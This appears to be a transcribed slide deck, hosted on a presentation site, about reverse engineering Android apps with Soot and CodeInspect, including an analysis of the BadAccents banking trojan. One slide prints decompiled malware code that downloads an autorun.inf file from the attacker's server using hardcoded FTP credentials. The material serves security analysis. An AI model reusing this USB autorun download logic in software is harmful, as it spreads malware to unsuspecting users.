dismantling droids for breakfast the current state of app
play

Dismantling droids for breakfast - The current state of app reverse - PowerPoint PPT Presentation

Mar 23, 2023 •222 likes •458 views

Dismantling droids for breakfast - The current state of app reverse engineering Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP #whoami 3rd year PhD-Student at Secure Software Engineering Group Darmstadt, Germany (Prof. Dr.

  1. Dismantling droids for breakfast - The current state of app reverse engineering Siegfried Rasthofer SECURE SOFTWARE ENGINEERING GROUP

  2. #whoami • 3rd year PhD-Student at Secure Software 
 Engineering Group Darmstadt, Germany 
 (Prof. Dr. Eric Bodden) • Research interest: • Applied software security on Android • Static-/dynamic code analyses • Android Security: • Found 2 AOSP exploits • Security Analysis of Backend-as-a-Service • Korea Threat investigation together with McAfee Research Lab SECURE 2 SOFTWARE ENGINEERING GROUP

  3. SECURE 3 SOFTWARE ENGINEERING GROUP

  4. How easy is it to dismantle your app? SECURE 4 SOFTWARE ENGINEERING GROUP

  5. How to secure my app against piracy I am developing an android app and I am planning to publish it (paid app). I have heard that it is very easy to pirate Android apps (much easier than iphone). I was wondering from your experience or what you know, how can increase the security of my app? I know that I can never get it 100% secured but I want to make it harder for people to pirate it or distribute it illegaly Any ideas, experiences, comments you can share? That will be greatly appreciated Best regards Source: stackoverflow.com SECURE 5 SOFTWARE ENGINEERING GROUP

  6. Is it still easy to dismantle your app? SECURE 6 SOFTWARE ENGINEERING GROUP

  7. A new Binary Analysis Framework for Android and Java Bytecode SECURE 7 SOFTWARE ENGINEERING GROUP

  8. vs SECURE 8 SOFTWARE ENGINEERING GROUP

  9. Soot SECURE 9 SOFTWARE ENGINEERING GROUP

  10. Soot Input/Output .dex .java .jimple .class .apk Soot - Various callgraph algorithms - Sophisticated algorithms used in compiler construction - Code manipulation https://github.com/Sable/soot/wiki SECURE 10 SOFTWARE ENGINEERING GROUP

  11. Jimple Soot SECURE 11 SOFTWARE ENGINEERING GROUP

  12. Jimple Soot public static boolean UsbAutoRunAttack(android.content.Context $param0) { Declarations java.lang.String $String; $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>; ... staticinvoke <smart.apps.droidcleaner.Tools: boolean Code DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)> ($String, "autorun.inf", "ftpupper", "thisisshit007", $param0); Return-Statement return true; } SECURE 12 SOFTWARE ENGINEERING GROUP

  13. CodeInspect Jimple Soot SECURE 13 SOFTWARE ENGINEERING GROUP

  14. Jimple CodeInspect Soot Syntax Code Java Source Highlighting Refactoring Enhancement Jimple Code Code Debugger Readable Manipulation Files Dataflow “Region“ Deobfuscator Visualizer Detection SECURE 14 SOFTWARE ENGINEERING GROUP

  15. Let’s get started… 1. Import APK 2. Start Device SECURE 15 SOFTWARE ENGINEERING GROUP

  16. infected >20,000 user SECURE 16 SOFTWARE ENGINEERING GROUP

  17. Android/BadAccents SMS SMS E-Mail E-Mail Install Install Tapjacking Activation Tapjacking Activation Uninstall AV Uninstall AV Fake AV Fake AV Attack Component Attack Component User User Intercept Call Intercept SMS Intercept SMS Intercept Call Banking Trojan Banking Trojan Send SMS Send SMS HTTP HTTP Native Code Native Code File System File System Waiting Time Waiting Time SECURE 17 SOFTWARE ENGINEERING GROUP

  18. Live-Demo SECURE 18 SOFTWARE ENGINEERING GROUP

  19. Future Steps • New Plugins under development • Easily add own analyses SECURE 19 SOFTWARE ENGINEERING GROUP

  20. How do I get this tool? SECURE 20 SOFTWARE ENGINEERING GROUP

  21. SECURE 21 SOFTWARE ENGINEERING GROUP

  22. Siegfried Rasthofer Secure Software Engineering Group Email: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.de Twitter: @CodeInspect SECURE 22 SOFTWARE ENGINEERING GROUP

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Backdoors furtives et autres fourberies dans le noyau Arnaud Ebalard

Backdoors furtives et autres fourberies dans le noyau Arnaud Ebalard

Backdoors furtives et autres fourberies dans le noyau Arnaud Ebalard &lt;troglocan@droids-corp.org&gt; Pierre Lalet &lt;pierre@droids-corp.org&gt; Olivier Matz &lt;zer0@droids-corp.org&gt; Les 45 prochaines minutes ... Injection de code

836 views • 38 slides
Breakfast Success The Importance of Eating Breakfast Breakfast Breakfast is the first meal of

Breakfast Success The Importance of Eating Breakfast Breakfast Breakfast is the first meal of

Breakfast Success The Importance of Eating Breakfast Breakfast Breakfast is the first meal of the day It is the first chance to break the fast and get nutrients in your body which provide the energy you need for the day Why is

319 views • 16 slides
Welcome to the Breakfast at the BMC Lecture Series Is Californias state o of emergency r

Welcome to the Breakfast at the BMC Lecture Series Is Californias state o of emergency r

Welcome to the Breakfast at the BMC Lecture Series Is Californias state o of emergency r restrictions on w water usage affecting t the San D Diego economy and d real e est state i indu dust stry? A s special t thanks t to our

860 views • 32 slides
VPFO STRATEGIC PLAN 2019-2021 Presentation for the VPFO Breakfast PET ER SM AIL ES , VICE- PR E

VPFO STRATEGIC PLAN 2019-2021 Presentation for the VPFO Breakfast PET ER SM AIL ES , VICE- PR E

VPFO STRATEGIC PLAN 2019-2021 Presentation for the VPFO Breakfast PET ER SM AIL ES , VICE- PR E SI D E NT , FIN AN CE &amp; OPER AT IO N S SEPT EM BER 6, 2019 VPFO STRATEGIC PLAN Current State Current Organizational structure and future

334 views • 20 slides
Customing Android: Looking inside the droids belly Embedded Android Appliances What do I mean by

Customing Android: Looking inside the droids belly Embedded Android Appliances What do I mean by

Customing Android: Looking inside the droids belly Embedded Android Appliances What do I mean by Appliances? appliance / pl ns/ Noun A device designed to perform a specific task, typically a domestic one. Digital Signage

1.04k views • 55 slides
AGENDA Time/Session: Panels/Topics 8:30 a.m. 9:00 a.m. Registration/Breakfast 9:00 a.m.

AGENDA Time/Session: Panels/Topics 8:30 a.m. 9:00 a.m. Registration/Breakfast 9:00 a.m.

3rd Annual Energy Storage Conference November 14, 2019 AGENDA Time/Session: Panels/Topics 8:30 a.m. 9:00 a.m. Registration/Breakfast 9:00 a.m. 9:30 a.m. Welcome Remarks Current State of Energy Storage Speakers: Richard F.

404 views • 3 slides
The Finances of Operating Universal Breakfast in the Classroom School Breakfast and Achievement

The Finances of Operating Universal Breakfast in the Classroom School Breakfast and Achievement

FRAC Breakfast Matters How to Webinar Series The Finances of Operating Universal Breakfast in the Classroom School Breakfast and Achievement Children who eat breakfast at school: Increase their math and reading scores Perform

894 views • 40 slides
Welcome to: Dismantling Non-Financial Barriers to Study Abroad Experienced by Underrepresented

Welcome to: Dismantling Non-Financial Barriers to Study Abroad Experienced by Underrepresented

Welcome to: Dismantling Non-Financial Barriers to Study Abroad Experienced by Underrepresented Students Consider Seating Yourselves by School Type (See Room Map at the Front) Dismantling Non-Financial Barriers to Study Abroad Experienced by

490 views • 44 slides
MONTANA NO KID HUNGRY BREAKFAST AFTER THE BELL 1 in 5 Breakfast after the Bell On average,

MONTANA NO KID HUNGRY BREAKFAST AFTER THE BELL 1 in 5 Breakfast after the Bell On average,

MONTANA NO KID HUNGRY BREAKFAST AFTER THE BELL 1 in 5 Breakfast after the Bell On average, school breakfast participation rises to more than 70% when schools implement a Breakfast after the Bell model versus 30% with a traditional model that

116 views • 10 slides
Presentation of food products Breakfast cereals Oho Breakfast cereals are well known in

Presentation of food products Breakfast cereals Oho Breakfast cereals are well known in

Presentation of food products Breakfast cereals Oho Breakfast cereals are well known in worldwide and have become an integral part of our diet and an important sector of the grocery market. Indeed, breakfast cereals are found in many of

301 views • 12 slides
evil maid on droids or why you should never loose your android smartphone @f0rki 2012-12-06

evil maid on droids or why you should never loose your android smartphone @f0rki 2012-12-06

evil maid on droids or why you should never loose your android smartphone @f0rki 2012-12-06 Agenda evil maids detour: the android boot process attack scenarios unrooted phones adb access rooted phones protecting yourself 2 / 51 Agenda

1.31k views • 85 slides
Finite State Machine (FSM) Consists of: CLK State register S S Next Current

Finite State Machine (FSM) Consists of: CLK State register S S Next Current

Finite State Machine (FSM) Consists of: CLK State register S S Next Current Stores current state State State Loads next state at clock edge Combinational logic Computes the next state Computes the outputs Next

412 views • 26 slides
Finite State Machine (FSM) Consists of: CLK State register S S Next Current

Finite State Machine (FSM) Consists of: CLK State register S S Next Current

Finite State Machine (FSM) Consists of: CLK State register S S Next Current Stores current state State State Loads next state at clock edge Combinational logic Computes the next state Computes the outputs Next

477 views • 25 slides
DROIDS @z @zer er0m 0mem em #whoami - Peter Hlavaty (@zer0mem) [ KEEN TEAM ] Background

DROIDS @z @zer er0m 0mem em #whoami - Peter Hlavaty (@zer0mem) [ KEEN TEAM ] Background

Racing with DROIDS @z @zer er0m 0mem em #whoami - Peter Hlavaty (@zer0mem) [ KEEN TEAM ] Background @K33nTeam Previously ~4 years in ESET Contact twitter : @zer0mem weibo : weibo.com/u/5238732594 blog :

673 views • 45 slides
Breakfast at YHS Smoothie Breakfast Bar Parfait Breakfast at YES Breakfast Bar Eggs from our

Breakfast at YHS Smoothie Breakfast Bar Parfait Breakfast at YES Breakfast Bar Eggs from our

Breakfast at YHS Smoothie Breakfast Bar Parfait Breakfast at YES Breakfast Bar Eggs from our Hens

203 views • 8 slides
Welcome Please help yourself to breakfast. 1 Agenda 8:00 - 8:45am Registration and Breakfast

Welcome Please help yourself to breakfast. 1 Agenda 8:00 - 8:45am Registration and Breakfast

Welcome Please help yourself to breakfast. 1 Agenda 8:00 - 8:45am Registration and Breakfast 8:45 - 8:55am Welcome 8:55 - 9:25am Daniel Hazlett, Financial Analyst, ezFedGrants, USDA 9:25 - 9:55am Q&amp;A and Discussion 9:55 - 10:00am

227 views • 18 slides
HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from &quot;Hardware Protection

HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from &quot;Hardware Protection

HOST Circuit Obfuscation I ECE 525 Hardware Obfuscation (Drawn from &quot;Hardware Protection thr Obfuscation) Circuit modification techniques designed to conceal or lock the functionality and/or circuit structure The modifications are designed

157 views • 11 slides
Traditional Commercial Software Development Open Source Development Producing consumer-oriented

Traditional Commercial Software Development Open Source Development Producing consumer-oriented

Traditional Commercial Software Development Open Source Development Producing consumer-oriented software is often done in much the same way as for tangible mass-produced Dr. James A. Bednar products, such as furniture or cars. E.g., a company:

526 views • 5 slides
Deobfuscation and beyond Vasily Bukasov and Dmitry Schelkunov https://re-crypt.com Agenda

Deobfuscation and beyond Vasily Bukasov and Dmitry Schelkunov https://re-crypt.com Agenda

Deobfuscation and beyond Vasily Bukasov and Dmitry Schelkunov https://re-crypt.com Agenda We'll speak about obfuscation techniques which commercial (and not only) obfuscators use and how symbolic equation systems could help to

612 views • 50 slides
Memoization Attacks and Memoization Attacks and Copy Protection in Copy Protection in

Memoization Attacks and Memoization Attacks and Copy Protection in Copy Protection in

Memoization Attacks and Memoization Attacks and Copy Protection in Copy Protection in Partitioned Applications Partitioned Applications Charles W. ODonnell 1 , G. Edward Suh 2 Marten van Dijk 1 , Srinivas Devadas 1 1 Massachusetts Institute

336 views • 32 slides
Where Hacking Meets Demoscene Abusing Kiddie-Hardware for the Greater Good Breakpoint 2008

Where Hacking Meets Demoscene Abusing Kiddie-Hardware for the Greater Good Breakpoint 2008

Where Hacking Meets Demoscene Abusing Kiddie-Hardware for the Greater Good Breakpoint 2008 Felix tmbinc Domke &lt;tmbinc@elitedvb.net&gt; True 64bit architecture 3 Dual-Thread cores, 3.2 Ghz each GB RAM Fast DVD-drive o

668 views • 41 slides
Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r www.vantagepoint.sg | office@vantagepoint.sg Hi everyone my name is Lyon Yang I hack IoT and embedded systems. I live in sunny Singapore. Spoke @

846 views • 47 slides
KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the existing Victorian style architecture surroundings offers a charming and trendy atmosphere that is unique and beloved by many. King West has been

326 views • 3 slides
Real World Cryptography 2015 London, UK, 7-9 January 2015

Real World Cryptography 2015 London, UK, 7-9 January 2015

Real World Cryptography 2015 London, UK, 7-9 January 2015 www.realworldcrypto.com/rwc2015 #realworldcrypto Welcoming Remarks Fire safety Lightning talks

338 views • 8 slides

More recommend